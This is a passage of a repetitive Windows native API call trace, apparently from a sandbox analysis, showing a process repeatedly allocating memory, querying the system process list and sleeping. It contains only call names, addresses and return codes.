ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.777] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.822] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.839] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.853] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.869] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.885] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.917] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.933] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.981] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.015] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.026] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.042] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.057] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.075] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.089] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.104] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.119] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.135] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 